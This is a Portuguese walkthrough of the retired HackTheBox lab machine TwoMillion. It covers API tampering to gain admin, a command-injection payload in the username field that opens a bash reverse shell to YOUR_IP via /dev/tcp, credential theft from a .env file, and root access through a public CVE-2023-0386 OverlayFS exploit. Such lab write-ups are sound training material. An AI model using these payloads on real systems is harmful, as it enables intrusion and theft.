
Writeup da máquina HackTheBox TwoMillion — abuso de API, injeção de comandos e CVE-2023-0386
Writeup da máquina TwoMillion do HackTheBox — abuso de API, injeção de comandos & CVE-2023-0386
| Campo | Detalhes |
|---|---|
| Nome | TwoMillion |
| Dificuldade | Fácil |
| OS | Linux |
| IP | 10.10.11.221 |
| CVE | CVE-2023-0386 |
TwoMillion é uma máquina Linux de dificuldade Fácil com tema baseado na antiga plataforma HackTheBox. Envolve decodificar um código de convite, abusar de endpoints da API, injeção de comandos no sistema operacional, descoberta de credenciais e uma escalada de privilégio no kernel Linux por meio do CVE-2023-0386 (OverlayFS).
nmap -sV -sC -v 10.10.11.221
Portas Abertas:
2million.htbAdicione ao /etc/hosts:
echo "10.10.11.221 2million.htb" >> /etc/hosts
curl -X POST http://2million.htb/api/v1/invite/how/to/generate
A resposta é codificada em ROT13. Decodifique-a:
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Gere o código de convite:
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d
Registre-se em http://2million.htb/register usando o código de convite decodificado.
Entre pelo navegador e capture o PHPSESSID dos cookies (F12 → Application → Cookies).
Escale para admin:
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"email":"[email protected]","is_admin":1}'
Verifique:
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}
Inicie o listener:
nc -lvnp 4444
Envie o payload de reverse shell:
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'
Shell recebido como www-data.
Encontre as credenciais no .env:
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123
Conecte via SSH:
ssh [email protected]
cat ~/user.txt
Verifique a dica:
cat /var/mail/admin
uname -r
# 5.15.70 — vulnerable to CVE-2023-0386
Baixe e compile o exploit no Kali:
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all
Transfira para o alvo:
# Kali
python3 -m http.server 8000
# Target
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all
Execute em dois terminais no alvo:
Terminal 1:
./fuse ./ovlcap/lower ./gc
Terminal 2:
./exp
Obtenha a flag de root:
cat /root/root.txt
Este writeup é apenas para fins educacionais em uma máquina aposentada do HackTheBox.
| Passo | Técnica |
|---|
| Reconhecimento | Varredura com Nmap |
| Código de Convite | Decodificação ROT13 + Base64 |
| PrivEsc Web | Manipulação da API → admin |
| Shell Inicial | Injeção de comandos no SO |
| Movimentação Lateral | Credenciais .env → SSH |
| Root | Exploit OverlayFS CVE-2023-0386 |